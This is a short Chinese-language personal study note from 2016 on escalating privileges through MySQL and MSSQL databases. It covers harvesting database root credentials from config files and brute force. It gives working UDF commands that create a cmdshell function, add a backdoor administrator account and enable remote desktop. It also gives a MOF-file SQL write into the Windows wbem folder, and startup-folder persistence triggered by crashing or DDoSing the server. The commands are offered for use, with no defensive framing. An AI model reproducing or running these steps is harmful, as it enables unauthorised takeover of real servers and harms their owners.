2016年4月10号渗透学习总结

    今天主要学习了，mysql和mssql的提权。

    想要通过数据库提权最重要的条件就是要知道数据库root的账号和密码。

   mysql提权：

获取mysql数据库账号密码的方法：

1. 查看网站配置文件（conn config data sql common inc等）
   2.查看数据库安装路径下的文件 安装目录/data/mysql/user.myd myi
   3.通过暴力破解得到（对于高版本数据库用处不大）

   暴力破解需要用到的两个不错的工具是：hscan hydra   hydra有linux的版本，在windows下效果不怎么样

   
   

mysql udf提权（通过自定义函数提权）
工具提权：用mysql提权工具进行提权，同样只适用于支持外链的数据库

脚本提权：（不支持外链的数据库）
去网上找mysql提权脚本，有的大马本身就有这功能，可以去网上找找
mysql <=5.0 导出到windows下
5.1之后在数据库的安装路径下创建libplugin文件夹再把udf.dll导出到这个文件夹中

select @@basedir 查看mysql的安装路径
提权命令：
create function cmdshell returns string soname 'udf.dll' （导出语句）
select cmdshell('net user iis_user 123!@#abcABC /add');
select cmdshell('net localgroup administrators iis_user /add');
select cmdshell('regedit /s d:web3389.reg');
drop function cmdshell; 

mysql mof提权（去网上下载mof提权的核心代码）

1.找个可写目录，上传mof文件     （转自：

http://www.myhack58.com/Article/html/3/8/2013/38264.htm）
2.执行sql语句
select load_file('C:\\RECYCLER\\nullevt.mof') into
dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

执行完之后等待即可。
执行完后需要执行： （转自：

http://www.myhack58.com/Article/html/3/8/2013/38264.htm）
2.执行sql语句
第一 net stop winmgmt 停止服务，
第二 删除文件夹：C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务

mysql 启动项提权
在目标服务器的启动文件夹中创建bat或vbs文件随主机启动
再用ddos或蓝屏使服务器重启
网上有教程可以去看看。

mssql提权：sqltools工具（数据库连接工具就可以）